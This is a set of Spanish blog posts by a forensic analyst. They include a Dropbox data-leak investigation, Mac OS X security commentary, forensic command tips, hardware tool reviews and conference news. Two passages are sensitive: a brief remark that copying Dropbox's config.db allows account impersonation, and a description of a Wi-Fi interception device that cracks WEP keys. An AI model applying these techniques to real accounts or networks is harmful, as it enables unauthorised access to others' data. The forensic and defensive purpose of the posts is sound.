Carlos es una persona dinamica, atrevida, un buen comercial, una persona hecha a sí misma, luchadora, positiva, de voluntad férrea y con un carisma y empatía hacia los clientes casi ilimitados. (¿Conoces a alguien así?, seguro que si). Por supuesto que estas cualidades no aseguran el éxito, pero sí ayudan a conseguir un buen puesto en la pole position y eso fué lo que le paso a Carlos encontro el trabajo de su vida en una empresa con la que competia, pero cometio un pequeño fallo se llevo de la anterior lo que no era suyo.

Este caso ocurre cada vez más a diario en las empresas. Por un lado la falta de legislación interna (procedimientos, normas, gestión de la seguridad) y por otro la falta de controles tecnológicos como seguridad en los puestos y dispositivos: como pendrives, cámaras de fotos y discos externos permiten que los usuarios con cierto acceso a información de la empresa y tras un tiempo consideren que esa información también les pertenece (Craso error!!).

Ya hemos hablado de ello en otras cocasiones y quizas lo más importante de todo es la falta de formación y/o concenciación sobre todo en la parte directiva que todavía o no entiende o no llega a ver la magnitud del problema.

Volviendo al caso, Carlos se despidio en Enero y "casualmente" en Febrero trabaja para la competencia. La Dirección de la empresa ante la sospecha decide realizar un análisis sobre el equipo (portátil) para determinar si ha existido una fuga de información.

Veamos que tiene Carlos.

Hacemos lo habitual, representante de la empresa, representante sindical, apertura de acta, adquisición de disco, huellas, etc, etc..y una vez obtenido se procede a la explotación de los datos.

Tras un análisis superficial nos encontramos en la carpeta de "C:\Users\0200CAR\" una carpeta de nombre "Dropbox". con los siguientes ficheros:

Vamos a análizar que es y como descubrimos una fuga de datos en la máquina de Carlos utilizando el servicio de DropBox.

Dropbox es un servicio de alojamiento de ficheros en la nube. El servicio permite a los usuarios almacenar y sincronizar archivos en línea y entre ordenadores y compartir archivos y carpetas con otros. El producto dispone de versiones gratuitas y de pago.

Actualmente tiene soporte para historial de revisiones, de forma que los archivos borrados de la carpeta de Dropbox pueden ser recuperados desde cualquiera de los ordenadores donde se disponga la misma cuenta. También existe la funcionalidad de conocer la historia de un archivo en el que se esté trabajando, permitiendo que una persona pueda editar y cargar los archivos sin peligro de que se puedan perder las versiones previas.
Si un archivo en una carpeta Dropbox de un usuario es cambiado, Dropbox solo carga las partes del archivo que son cambiadas cuando se sincroniza. Este acción es una de las que sale reflejada en esta actuación.

Los ficheros de la configuración del equipo de Carlos están en formato SQL LITE y por lo tanto y como en ocasiones anteriores es sencillo de poder analizar la estructura de la base de datos y tablas. Para ello me voy a basar en la información de mi buen amigo Derek Newton al cual conocí personalmente en una de estas quedadas de 'Analistas forenses' en Estados Unidos.

Veamos que contiene:

config.db:

Contiene la configuración del cliente e incluye muchos campos de los que destaco los siguientes:

host_id: Es el hash de autenticación utilizado por el cliente para autenticar en Dropbox. Este hash se asigna al realizar la instalación inicial y la autenticación y no cambia si este no es revocado desde la interfaz web de Dropbox.

correo electrónico: Dirección de correo electrónico titular de la cuenta.

dropbox_path: Ruta de acceso

recently_changed3: muestra la ruta / nombre de archivo para los últimos cinco ficheros cambiados recientemente . Este es probablemente el único campo realmente útil en el análisis forense.

root_ns: Hace referencia a la ruta de acceso base Dropbox.

filecache.db:

Contiene una serie de tablas, pero el objetivo principal es describir todos los archivos de forma activa en el cuadro de selección.

file_journal: Incluye el tamaño de archivo, ruta de acceso (en bytes), mtime (fecha de modificación del archivo, en formato POSIX), ctime (hora de creación), local_dir (bandera que indica si la entrada es un directorio ), block_ref: ID de archivo de mapas (fj_id) para presentar los hashes (hash_id) que se encuentran en la tabla block_cache.

block_cache: Identificador del hash (id).
mount_table: Aparece en las carpetas de lista que se comparten con otros usuarios de Dropbox.

host.db:

El fichero se encuentra totalmente vacío.

sigstore.db:

Almacena los valores hash con los que corresponden a los valores que se encuentran en la tabla block_cache en filecache.db.

unlink.db:

Parece ser un archivo binario.

En cuanto a nuestro Análisis forense nos encontramos con las siguientes evidencias centrandome en el fichero 'config.db' y que particularmente he exportado a Excel para su mayor manejo y comprensión del contenido de los campos (y destaco los que me parecen significativos en color rojo)

host_id: 1afd404a46c53dac85bc296bc60e9bdc

Es el identificador de Carlos en la nube de DropBox

email: carlos.pXX(borrado intencionadamente y poco más que decir que es una cuenta de correo en la que claramente identifica que ha utilizado una cuenta personal)

recently_changed3:

tlp1 (V34923386:/DATOS_CLIENTES/clientes.xls I00 tp2 a(V34923386:/DATOS_CLIENTES/FORMULARIO_SERVICIOS.doc I00
tp3 a(V34923386:/DATOS_CLIENTES/shareddir.dat Ntp4 a(V34923386:/DATOS_CLIENTES/known2.met
Ntp5 a(V34923386:/DATOS_CLIENTES/known.met Ntp6 a.

Este campo es interesante dado que muestra la ruta y nombre de archivo para los cinco ultimos ficheros que han cambiado recientemente. La mayoría de los archivos que aquí aparecen incluyen los archivos eliminados o borrados de la lista desplegable. El contenido para este registro se basa en texto y es coherente con el siguiente formato:

El texto comienza con "tp1", termina con "a"., el siguiente tp2 y así sucesivamente
Las entradas están en orden de más reciente a menos reciente y cada entrada es el nombre del archivo / ruta seguida por "I00".

Si el archivo se ha eliminado o borrado de la Dropbox, el "I00" el texto se elimina y una "N" se coloca en delante del texto "TP #"

Por lo tanto en esta entrada tenemos como minimo una lista de ficheros (tras consultarlo con la empresa, nos asegurán que los nombres coinciden con los que ellos disponen actualmente), los ficheros (entre otros) se llaman, clientes.xls y formulario_servicios.docx

También el fichero 'filecache.db' contiene información interesante:

Y ahora vamos a ver que ficheros son los que tiene sincronizados el DropBox o como mínimo los que la empresa ha identificado, para ello vamos a ver la tabla 'file_journal'

En ella vemos los id's: 158, 159 y 160 que contienen la ruta y el nombre de los ficheros. Evidentemente coinciden con los ficheros anteriores.

Para corroborar lo visto falta que nos traigan el móvil de Carlos, al cual en su momento pertinente procederé a realizar un análisis para disponer en el mejor de los casos de dos evidencias, siempre y cuando tenga montado en su dispositivo DropBox.

Conclusiones:

Una vez realizado el análisis del disco duro del portátil, se extrae que Carlos en un periodo entre un mes antes de su marcha a la competencia y dadas la evidencias siguientes se ve que estuvo trabajando con datos confidenciales a los que tenía acceso. Las evidencias (entre otras) mostradas en el informe fueron las siguientes:

En el disco duro no existen los ficheros propiedad de la empresa.
No existe actividad de inserción de dispositivos externos.
Aparecen referencias de accesos directos en documentos recientes.
En el fichero de paginación aparecen contenidos de estos ficheros (es decir se abrieron).
Se evidencia accesos del histórico de URL' de Firefox s a DropBox.
Se encuentra DropBox instalado y funcionando, se verifica la existencia de estos ficheros dentro de la bd.
Se recuperan ficheros borrados que coinciden con los que son propiedad de la empresa y se comprueba que la fecha de ultimo acceso es de cinco días antes de su marcha.

Ahora el caso está pendiente de la Justicia.

Quisiera comentar que según Derek y tal y como he leído en los foros de DropBox, parece ser que la autenticidad del usuario de una cuenta de este servicio es vulnerable con tan solo copiar el fichero 'config.db' a otro directorio base de DropBox que pertenezca a otro usuario, pudiendo suplantar y acceder a los datos de este. (Esto no lo he corroborado y se pasa del mero trabajo realizado sobre este portátil). Aunque si alguien ha accedido a tu máquina y es capaz de copiar el fichero de marras, quizás lo que menos te preocupes es que se lleven este fichero, dado que se han podido llevar TODO.

Hablando de este y otros temas con mi buen amigo Yago Jesús de Security By Default, coincidimos en que sería tan simple como cifrar el contenedor de DropBox, cosa que Yago os explicará en breves en Security By Default. No os lo perdáis.

Referencias:

http://dereknewton.com/2011/04/dropbox-authentication-static-host-ids/
http://www.reversecurity.com/2011/04/video-demonstration-of-dropbox.html
http://forums.dropbox.com/topic.php?id=37231

Forensics Mac OSX. Mitos y realidades (I)

2011-01-24T17:58:00.000+01:00

Hola lectores,

Hace días que no escribo y no es por otra cosa más que por falta de tiempo. Entre conferencia y conferencia y trabajo y trabajo apenas me queda tiempo de dedicarle tiempo al blog. Bueno espero que la situación empiece a cambiar y tenga algo más de tiempo para escribir.

Hoy vamos a hablar sobre Mac OSX en entornos forenses. Todo es debido a que hemos tenido un caso de lo más curioso que rompe los mitos de que 'mi mac es mas seguro que windows' o 'en mac no hace falta antivirus'. Nada más lejos de la realidad. También quiero explicar que con estos post no quiero polemizar ni crear un debate, tan solo pretende ser objetivo con un sistema operativo al cual me he tenido que enfrentar en ocasiones en diversos análisis forenses y compartirlo con ustedes los lectores.

El objeto de escribir este post viene dado a que hemos colaborado con una entidad financiera que ha recibido un ataque de denegación de servicio DDOS desde un olvidado Mac

En este post vamos a ver paso a paso que es y que se precisa para realizar un forense.

Los post que voy a escribir tratarán en mayor y menor medida el siguiente índice:

Forensics Mac OSX. Mitos y realidades (I)
Forensics Mac OSX. Carácteristicas de Mac OSX y requisitos para un forense (II)
Forensics Mac OSX. Analizando el sistema, herraimentas y utilidades (III)
Forensics Mac OSX. Un caso real, paso a paso (IV) (Como comentaba anteriormente una entidad financiera ha tenido un problema en sus servicios centrales dejando inoperativo el acceso a cajeros y servidores de la entidad y todo gracias a un mac.)

EMPEZAMOS

¿Pero que es OSX?

OS X es un sistema operativo desarrollado y comercializado por Apple Inc. Está basado en UNIX, y se construyó sobre las tecnologías desarrolladas en NeX. El servidor Mac OSX incluye herramientas para administrar grupos de trabajo e incluyen un servidor de correo, un servidor Samba, un servidor LDAP y un servidor de dominio.

El Mac OS X posee una arquitectura modular que se construye a partir de cuatro componentes básicos: el sistema operativo central , un conjunto de estructuras de aplicaciones, sistemas de gráficos basados en estándares y la interfaz de usuario.

Mac OS X incorpora Cocoa que es un conjunto de estructuras orientadas a objetos que permite añadir interfaces de usuario gráficas al software UNIX existente y crear aplicaciones completamente nuevas desde cero. Java permite el desarrollo y la ejecución de programas multiplataforma Java 2 Edición Estándar en Mac OS X, incluidos los que están programados con Java Developer Kit (JDK) 1.4.1.

¿Es seguro mi MAC?

En materias de seguridad y según dice WIKIPEDIA:

"La arquitectura de seguridad integrada en el Mac OS X, al igual que en otros sistemas Unix, es una de las principales razones por las que los Mac están libres de malware." ¡¡FAIL!!. El autor de esta entrada o no está muy bien enterado o es un 'Mac abdupted'

Si nos vamos a la fuente de vulnerabilidades en SECUNIA podemos ver lo siguiente:

Es decir el pasado año 2010 se han contabilizado vulnerabilidades en Mac OSX y si lo comprobamos con la siguiente gráfica:

Es para tenerle miedo, mas si nos fijamos en que el 17% de vulnerabilidades quedarón sin parchear el pasado año, si además nos fijamos en la siguiente:

El 67% de vulnerabilidades son de nivel alto y en la siguiente:

Ya es para morirse el 83% son remotas y más viendo lo que se puede conseguir con esta última pantalla:

El 18% acceso al sistema y otro 18% de denegación de servicio,es decir como conclusiones, Mac OSX al igual que todos los sistemas operativos tienen fallos de seguridad y por lo tanto hay que tenerlo en cuenta en un entorno familiar o profesional.
¿Tienen virus y troyanos los Mac?

Si. y aqui tenemos algunos ejemplos no muy lejanos (ejemplos sacados de Seguridad Apple pero que quiero volver a destacar):
- Virus en Mac OS X: De las primeras pruebas de concepto de virus en Mac OS X hay que hablar de Macarena, un virus que infectaba los ficheros de una carpeta y del que se alertó en Febrero del año 2006. Era inofensivo, pero dejaba claro que el malware estaba llegando a Mac OS X.

- Rootkits en Mac OS X: Dino Dai Zovi, conocido experto de seguridad de gran reputación, publicó en el año 2009 las Mac OS X Advanced Rootkit Tools. Estas herramientas las utilizó para demostrar como se pueden crear rootkits y malware avanzado en los sistemas Mac OS X en las conferencias Black Hat USA 2009, dentro de su presentación "Advanced Mac OS X Rootkits"

- Bootnets en Mac OS X: Utilizando uno de los caminos de infección más sencillos, La Piratería, en Abril del año 2009 se creo la primera botnet activa de equipos con Mac OS X. Para ello se modificó el paquete iWorks para meterlo troyanizado en las redes P2P. Los usuarios accedían a una copia modificada con malware de iWorks y Photoshop.

- Troyanos en Mac OS X: En Octubre del 2007 la firma Intengo alertaba de la existencia del troyano OSX.RSPlug.A, un malware que redirigía el tráfico de determinadas direcciones por medio de manipulaciones en el DNS, cambiando las direcciones de distintos dominios. Se colaba simulando ser un Codec que utilizaban los sitios de contenido adulto de pago para el visor de Quicktime.

¿Son seguras las aplicaciones?

Tanto como en tu Windows, depende de tu sentido común. Si te las bajas de tu Appstore o sitios de confianza son 'algo' mas seguras, pero como utilices P2P, pues ya sabes tienes un regalito como paso hace menos de un mes con la variante .F de Bookface, un gusano diseñado especialmente para convertirte en zombie. Aunque es algo antigua se ha proliferado de una forma especial mediante una infección original de los paquetes iWorks 09, photoshop y ahora en su nueva versión de safari.

Conclusiones

Todos los sistemas operativos están desarrollados por personas y como tal somos humanos y como humanos cometemos fallos y el software por mucho que sea bonito, accesible, potente, robusto y escalable, lo hizo en algún momento un becario, programador junior, senior o jefe de proyecto y el que no se haya equivocado alguna vez en el desarrollo de un código que tire la primera primera piedra.

Insisto no se trata de inmolar a Mac, solo que cuando un iMac, o un Mac entra en la empresa, por solo ser uno o dos no lo metemos en las politicas de seguridad de la empresa y por lo tanto son libres de todo. Seamos consecuentes todo sistema operativo y/o aplicaciones han de pasar por un severo análisis y dejarnos de llevar por la complacencia de 'esto es seguro por que lo es' ¿?

El siguiente post 'Forensics Mac OSX. Carácteristicas de Mac OSX y requisitos para un forense (II)'

Saludos lectores :-)

Rooted CON 2011

2010-12-24T11:32:00.000+01:00

Hola lectores,

Esta semana se anunciaron los primeros ponentes para Rooted CON 2011, incluso antes de que finalice el Call-For-Papers, vigente hasta el 31 de Diciembre de 2010.

Es para mi un placer anunciaros que voy a asistir como ponente y como 'profe' en la próxima Rooted CON 2011.

Los primeros nombres seleccionados, elegidos por encontrarse entre los mejor valorados de Rooted CON 2010 por parte de los asistentes son: Joxean Koret (Database Security Paradise), Yo y Eduardo Abril (charla titulada Hospital Central - tus datos son mis datos) y Chema Alonso (todavia no se sabe ¿hablará de la Foca?)

La ponencia la voy a compartir con el 'petardo' y muy buen amigo Eduardo Abril, si, ese del humor ingles.

Vamos a exponer una cosa chula o por lo menos eso creo, ya que va de una auditoría que realizamos tiempo atras a un hospital (hable de ello en un post) y en la que aplicamos ingenieria social con un exito rotundo. Os aseguro que os divertireis tanto como lo hicimos nosotros.

Como 'profe' voy a impartir una clase sobre 'análisis forense en dispositivos móviles' y como en otras ocasiones contaré casos en los que me he encontrado.

Lo dicho nos vemos en la Rooted!!

Y yo sin jugar...(BIT vs GDT)

2010-12-18T18:40:00.000+01:00

Hola lectores,

Se aproxima la navidad, el turrón y esas cosas buenas para ganar kilos...y como no podía ser de otra forma el pasado viernes se celebró un partido fraternal de fútbol entre el Grupo de Delitos Telemáticos de la Guardia Civil y la Brigada de Investigación Tecnológica de la Policía Nacional.

Como ya comenté en ocasiones anteriores estos dos cuerpos son la primera linea de fuego y de lo mejorcito que tenemos actualmente.

Al final gano la BIT (Y yo sin jugar, cachis...)

Quiero aprovechar desde estás lineas que la B.I.T ha lanzado (al igual que ya hizo el Grupo de Delitos Telemáticos) su incursión en las redes sociales con el objeto de acercarse más al ciudadano y que este tenga oportunidad de denunciar de forma más sencilla y estar todos más seguros en Internet.

Este es el enlace:

http://www.facebook.com/BrigadaInvestigacionTecnologica

Su misión consiste en obtener las pruebas, perseguir a los delincuentes y poner a unas y otros a disposición judicial. Sus herramientas son la formación continua de los investigadores, la colaboración de las más punteras instituciones públicas y privadas, la participación activa en los foros internacionales de cooperación policial y la colaboración ciudadana.

Como siempre os animo a todos y todas a suscribirse a esta iniciativa y a colaborar todos contra la ciberdelincuencia.

Os dejo la foto (Cuidadín con esas barrigitas de famosa)

¡¡ Nos vamos al CCN-CERT !!

2010-12-13T13:12:00.001+01:00

Hola lectores,

Mañana me toca conferencia en el CCN-CERT.

El CCN-CERT es la Capacidad de Respuesta a incidentes de Seguridad de la Información del Centro Criptológico Nacional (CCN), dependiente del Centro Nacional de Inteligencia (CNI). Este servicio se creó a principios de 2007 como CERT gubernamental español y está presente en los principales foros internacionales en los que se comparte objetivos, ideas e información sobre la seguridad de forma global.

En mi caso voy hablar sobre un troyano que roba información y la manda a diversos sitios en Internet. Lo curioso del tema es que está realmente gestionado por un panel de control que gestiona una botnet. Todavia mi equipo esta 'descifrando' parte del troyano y sera motivo seguramente de escribir un post sobre este curioso malware.

También estarán muchos colegas conocidos, entre ellos David Barroso, Raul Siles, Olof Sandstrom, Marc Vilanova, José Antonio Mañas, Juan Vázquez y otros.

Aquí os dejo la agenda de mañana y desde este link también se puede acceder.

Tips & Tricks (I)

2010-12-05T18:25:00.002+01:00

Hola lectores,

Muchos me preguntais sobre temas de extracción de datos y trucos que utilizo.

Hace dias me paso lo mismo en un análisis forense y la verdad no me acordaba de un paso en concreto y tuve que poner imaginación para recordarlo, así que he decidido ponerlo en el blog, con objeto de recordarmelo a mi mismo y compartirlo con todos. (dedicado a FRAN de la GDT)

Son pequeños trucos que utilizo de vez en cuando.

Creación de una línea de tiempo con las TCTUtils

Utilidades escritas por Brian Carrier:

jBcat: Muestra el contenido de un bloque de disco a la salida estándar.

blockcalc: Mapas entre las imágenes con dd y sus diferencias
fls: Muestra entradas de ficheros y directorios que han sido borrados. Usando fls con la opción-d hace una lista de los nombres de todos los archivos borrados en la imagen.
find_file: Determina qué archivo tiene asignado un inodo de una imagen.
find_inode: Determina que inodo ha asignado un bloque de una imagen.
istat : Muestra información sobre un inodo.
mac_merge: Combina la salida de 'fls-m' con la salida de mactime TCT para crear una línea de tiempo grandes.

C:\forensics\TSK\fls –m ‘C:/’ –f ntfs –r \\.\Z: > c:\casos_forenses\empresa\timelines\ficheros

Perl C:\forensics\TSK\mactime.pl –d –b c:\casos_forenses\empresa\timelines\ficheros\lineadetiempo.csv

Búsqueda de palabras importantes

C:\casos_forenses\empresa\ripped>strings *.txt | grep –i

C:\casos_forenses\empresa\ripped>strings *.csv | grep –i

Por fechas

fichero.csv | grep -i "Dec 3 2010" | grep "..b,r"

Buscar HIVES en el NTUSER.dat con regtime

La utilidad regtime.pl procesará las marcas de tiempo en cada clave de una sección del Registro

C:\>Perl C:\forensics\SIFT\bin\regtime.pl –m HKLM/system –r -d -m C:\casos_forenses\empresa\hives\system >> fichero.csv

Otra forma con rip de las ya comentadas RegRipper

C:\forensics\RegRipper\rip.exe –r c:\casos_forenses\empresa\registry\SAM –f SAM > sam_ripped.txt

C:\forensics\RegRipper\rip.exe –r c:\casos_forenses\empresa\registry\system –f System>system_ripped.txt

C:\forensics\RegRipper\rip.exe –r c:\casos_forenses\empresa\registry\ntuser.dat –f ntuser> ntuser.ripped.txt

Mostrar carpetas ocultas

Registry Keys
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Value Name: Hidden
Data Type: REG_DWORD (DWORD Value)
Value Data: (1 = show hidden, 2 = do not show)

Para MAC

Puedemos utilizar la función Analyze MacForensicsLab con el siguiente archivo: ~ / Library / Preferences / com.apple.finder.plist Dentro de ese archivo que se encuentra "FXConnectToLastURL". Esta entrada muestra los servidores de archivos relacionados con los datos del sospechoso. y la entrada "CFURLAliasData" tendrá los nombres de los servidores de archivo de acceso, imágenes de disco montadas y muestra el último conjunto de carpetas que se accedió.

That's all, folks!!"

Publicados los RootedLabs 2011

2010-11-30T11:37:00.000+01:00

Hola lectores,

Ya han salido publicadas las RootedLabs 2011.

Es un conjunto de actividades formativas que se realizarán durante los tres días previos a RootedCON 2011, es decir, Lunes 28 de Febrero, Martes 1 y Miércoles 2 de Marzo de 2011. En lo que a mi respecta impartire una formación técnica en Análisis forense en dispositivos móviles.

Si os interesa el tema y quereis tomaros unas cervezas conmigo, digo aprender sobre este tema, ya sabeis...

¿A que huelen la nubes? Una de privacidad

2010-11-23T23:39:00.000+01:00

Hola lectores,

Hoy he escrito un post de esos que joden, de esos de pensamiento profundo, de análisis y reflexión.

Hoy muchas empresas y muchas de ellas de seguridad hablan de la nube, esa donde todos tus datos de empleado y tus datos financieros y tus fotos de cumpleaños, de borracheras y de quien sabe qué, están allí, en poder de ellos y poco en tu mano.

No es que sea pesimista, pero los lemas de "los amigos de tus amigos son mis amigos" no me mola. Eso de que tus correos infinitos en hipermegabytes y documentos 'gdocs' son suyos pero también mios no me mola. Eso de que 'me cago' lo voy a twittear tampoco, lo siento pero soy un espécimen raro, esos de los de antes y no digo que las redes sociales sean malas solo digo que nadie se lee la letra pequeña y que se informa nada o lo justo

Y así nos van las cosas.

Cuantos problemas de privacidad no incluye una etiqueta en una foto o el cambio de tu estado
¿Donde esta la 'security by default'? ya lo dijo con toda la razón Lorenzo en su post , pero además según dice facebook:

.- Nos concedes una licencia no exclusiva, transferible (adios foto, adios toa para ti).

.- Esta licencia finaliza cuando eliminas tu contenido o tu cuenta (a menos que el contenido se ha compartido con terceros y éstos no lo han eliminado) (usease, no te garantizo que este borrado) En este ejemplo que veis es de hace un mes y todavia me tienen localizado

Y no es que este mal ni los culpo, pero hay muy poca información para el usuario o mejor dicho, mucha pero en letra pequeña y en casos escondidas.

Me fastidia el 'es posible' y 'el gif trasparente'... es decir la trampa que utilizo para saber cuando quiero capturar un sospechoso y abre un email (solo bajo petición judicial)...increíble que aceptemos estas cosas...(yo incluido)

Y estas clausulas me dan un miedo que no veas, lo tienen todo todo.

Tu IP, tu idioma, tu localización (si utilizas latitude), si instalas y desinstalas.

Además de todas estas cosas yo me pregunto si facebook tiene 200 millones de usuarios, algo parecido así:

¿Que poder tienen los gobiernos y las legislaciones sobre este nuevo estado o país?

¿Que ocurre si algún día alguien de la nube decide que no eres nadie, que has incumplido su política de privacidad o comercial y decide desterrarte?. ¿Que pasa con tus datos?, ¿realmente sabes donde están?, cuando borras ¿realmente borras?.

¿A quien reclamas?

Claro que por otro lado con usuarios como estos...mejor me callo

Se de un colega que le han pirateado su cuenta de la nube y ahora es un desterrado digital, tienen acceso a toda su vida... es lo que toca.

Yo voy a seguir con mi disco duro en local y cifrado por si acaso...

Hardware Forensics

2010-11-16T11:43:00.000+01:00

Hola lectores,

Hace tiempo que quiero hablaros de unos productos comerciales basados en Hardware que nos han ayudado en diversos casos forenses. No es que sea muy dado a explicar productos comerciales en el blog, dado que me gusta emplear el ingenio con las propias herramientas que tenemos de código abierto o del propio sistema operativo. Pero la verdad que para casos muy concretos, que requieran velocidad y sencillez, voy a proponer estos que nosotros estamos utilizando.

DISPOSITIVOS MOVILES

UFED (Universal Forensic Extraction Device)

Maravilloso producto distribuido por CELLEBRITE capaz de extraer datos de la mayoría de dispositivos móviles del mercado, incluidos los smartphones y dispositivos PDA (Palm OS, Microsoft, Blackberry, Symbian, iPhone y Google Android).

Entre las cosas que es capaz de adquirir se encuentran las mas usuales:

Contactos
Mensajes de texto SMS
Mensajes de texto eliminados (SIM/USIM)
Historial de llamadas (recibidas, realizadas, perdidas)
Audio
Vídeo
Fotos e imágenes
Melodías
Datos del teléfono (IMEI/ESN, número de teléfono)

Para nosotros nos parece una herramienta imprescindible sobre todo cuando tienes que clonar un móvil casi sin tocarlo.

Aquí tenéis unas fotos en acción obteniendo datos de un Iphone:

Copia los datos del Iphone a un pendrive

Progreso de la copia

Proceso de recuperación de la información del iphone a un portátil

Otro de los productos que más solemos utilizar son las clonadoras.

CLONADORES DE DISCO

VOOM HARDCOPY III

Si lo que queremos es una copia lo más rápidamente posible hemos de ir por este hardware duplicador de disco duro portátil, con capacidad de protección de disco y con doble salida para realizar desde clonados a discos idénticos o a imagen en formato dd. También una de las características que mas me gusta es la posibilidad de calcular el HASH de los discos.

Estas son algunas de sus capacidades:

La velocidad de clonado a dos unidades de destino es de hasta 7.1 GB / min.
Posibilidad de realizar uno o dos pases con MD5 y SHA256
Extremadamente sencillo de utilizar
Actualizaciones de por vida
Adaptadores IDE incluidos.

Y aquí lo tenemos en acción:

Vista global del clonador

Calculando el hash

WIFI

WIRELESS DETECTIVE

Este producto es una de nuestras mejores adquisiciones más o menos resumiendo es un sistema de interceptación en redes wifi.

Esto permite un fácil seguimiento y captura de las actividades de Internet del sospechoso, especialmente si se mueve de un lugar a otro.

Las características son las siguientes:

Detecta el acceso no autorizado WIFI / intrusos (IDS).
Proporciona información detallada de la AP, routers inalámbricos y estaciones inalámbricas (como el canal, Mbps, la seguridad (encriptación), IP, intensidad de la señal, fabricante, MAC)
Proporciona la captura de paquetes WLAN de un solo canal, AP STA, o de múltiples canales mediante la implementación de distribución / sistemas múltiples.
Proporciona descifrado de claves wi-fi, la clave WEP (LLeva un módulo WPA de pago)
Proporciona decodificación y la reconstrucción de los servicios de Internet diferentes y protocolos mostrando los datos reconstruidos de forma gráfica
Permite grabar en archivo los datos capturados (para su posterior análisis en caso necesario)
Proporciona la función de localización de equipos inalámbricos

Básicamente es un software que viene integrado en un portátil de la marca Lenovo con una antena extensible y una tarjeta wifi especifica en modo promiscuo .

BORRADO SEGURO

Si quieres eliminar tus datos de empresa de forma segura disponemos de una unidad especial de borrado de discos duros llamada Drive eRazer. El Drive eRazer se conecta a un disco duro y este hace todo el trabajo de borrado. Borra el disco a razón de 35 MB/s, mucho más rápido que hacerlo por software y por su puesto sobreescribe en ceros, muy empleado por el ejercito de los EEUU y por nosotros mismos cuando queremos 'destruir' un disco.

Tengo más juguetitos, pero estos son quizás los mas espectaculares...

Estamos en el Simposium Internacional en Toluca, México

2010-10-28T13:49:00.001+02:00

Hola lectores,

Ayer Miercoles comenzó el XVI Simposium Internacional en Toluca, México. En estos días que estamos quiero destacar la impresionante gestión que están realizando los organizadores, que supera a otras que he estado en Europa y Asia, es de lo mejor que he visto.

Toluca es un bonito pueblo de gente sencilla y humilde, en estos días se celebra el "día de los muertos" y aquí en México la gente lo disfruta de lo lindo, todo es un ambiente festivo.

Ayer día 27 las conferencias programadas fuerón:

Leobardo Hernandez
Aplicaciones de la criptografia a la seguridad (no tuve ocasión de "platicar" con el)

Marcelo Rivero
Virus de antes, Malwares de hoy (Marcelo es un crack, menuda conferencia que dío)

Yo mismo
Análisis forense en una fuga de datos (Menudo show monte, ¿que pasa wey?)

Diego Ferreiro
Seguridad Web 2.0 (Este es un puto crack, como persona y como amigo, menuda calidad humana, tengo un post solo para el)

El día fué más o menos así:

Vista de la Plaza de Toluca

LLegada al teatro donde se organiza el evento

Diego y su universidad de la coruña ¿polo de ConexiónInversa? ESTO ES INCREIBLE

Marcelo y su InfoSpyware

Los tres IM ponentes

Esto empieza a llenarse (600 asistentes)

Luego se celebró una mesa redonda, en la que discutimos de todo y despues unos tequilas para templar el cuerpo.

También quiero dar las gracias a los asistentes ya que fueron muy amables y muy entregados tanto en las conferencias como en la ronda de preguntas, gracias por pasar un buen rato con nosotros.

Hoy toca ver al Maligno de Chema Alonso y me voy a la tarde con Diego para el congreso de la BugCon. y luego de vuelta a Toluca que Diego tiene un training.

Ya os mantengo informados.

Saludos lectores...

Nos vamos a la Noconname!!

2010-10-11T22:46:00.001+02:00

Hola lectores,

Voy de ponente a la NcN y me he dejado 'engañar' `por Nico para ser parte del jurado en dos concursos, a los cuales os incito a participar.

Uno se llama "Iluminación de Randa" y es un concurso Multidisciplinar en el que los participantes deberán demostrar la habilidad para dar una solución a un problema de carácter real creado para la ocasión.

El otro es (como no) un reto forense y consiste en un juego para el que es necesario aplicar diversas técnicas comúnmente usadas para el análisis forense de sistemas. Se proporciona a los participantes la imágen de una partición de disco para que estos la analicen y expongan todo lo que encuentren en ella.

NOCONNAME.

Es la asociación con más antigüedad en España, dedicada a la congregación anual de expertos en seguridad informática en el campo de la investigación. Creo recordar que fue en el año 2002 cuando empece a ir a las charlas en Palma de Mallorca, (menudos fiestones nos preparaba Nico.)

Nico, es el "alma mater" de este congreso, es un 'tipo' decidido, de esos que se comprometen, que le dedican tiempo y alma en algo que cree. Es el investigador por excelencia, es el amigo que siempre te dice '¿pues claro y por que no? . Es joven, audaz y sabe bailar salsa (es el primer tio que conozco que le gusta eso ;-) )

Este año se retoma la actividad después de cuatro años sin actividad para volver con más fuerza que nunca con un montón de gente conocida.

Entre ellos encontraréis a , "El maligno Chema Alonso", mi compadre Juanito, el supermaño Yago, el onmipresente Alejandro Ramos y muchos más....

Espero veros a todos(as) y tomar unas cervezas, cafés, cocalocas y demás..., estar y simplemente compartir...

Para los que queráís empezar en esto de la seguridad, este es vuestro sitio.

PD: Sorpresa para aelita

¡¡ Muy bien por la BIT !!

2010-10-08T12:53:00.004+02:00

Un centenar de detenidos e imputados por pornografía infantil

Más de un centenar de personas, dos de ellas de Aragón, han sido detenidas o imputadas en una redada llevada a cabo por la Policía Nacional contra la pornografía infantil desarrollada en toda España.

En concreto, en la operación se han detenido a 57 personas (once de ellas han pasado a disposición judicial) e imputado a otras 47, según ha informado hoy la Dirección General de la Policía y la Guardia Civil, que ha precisado que han participado 400 agentes, que han practicado 97 registros en toda España con la intervención de más de 70 juzgados de guardia y secretarios judiciales.

"Uno de los detenidos es un productor de material pornográfico infantil que, además de poseer y distribuir archivos de este tipo, había grabado imágenes de dos familiares menores -de siete y catorce años- en actitud sexual.

Unas imágenes que tenía almacenadas, en soportes informáticos que contenían otros vídeos pedófilos de extrema dureza, esta persona de profesión jardinero y con un nivel alto de conocimientos informáticos, que ha pasado a disposición judicial tras prestar declaración. "

Entre los implicados, de los cuales uno está domiciliado en Teruel y otro en Zaragoza, hay además policías locales, ingenieros informáticos, directores de empresa, estudiantes, desempleados, pizzeros o caldereros.

Los policías, pertenecientes a 36 plantillas del Cuerpo, coordinados por la Brigada de Investigación Tecnológica (BIT), han intervenido 328 discos duros, 40 ordenadores portátiles, 21 CPU's, 2 notebook, centenares de dvd's y cd's, 13 pendrives y 8 tarjetas de memoria.

Para escudriñar la red e identificar a los usuarios que compartiesen y por lo tanto distribuyeran archivos a través de las redes de intercambio 'peer to peer', los agentes utilizaron por primera vez el software NordicMule, desarrollado por el Servicio Nacional de Investigación Criminal de Noruega (NCIS).

Este sofisticado programa permite realizar las descargas sin compartir el contenido de los archivos descargados, seleccionar el país en el que se ubican los usuarios investigados y además visualizar de modo gráfico la información relativa a usuarios que están compartiendo en ese momento los archivos investigados.

Tras la solicitud de descarga, el programa crea automáticamente una tabla en la que quedan reflejados todos los datos necesarios para llevar a cabo la identificación de los usuarios investigados.

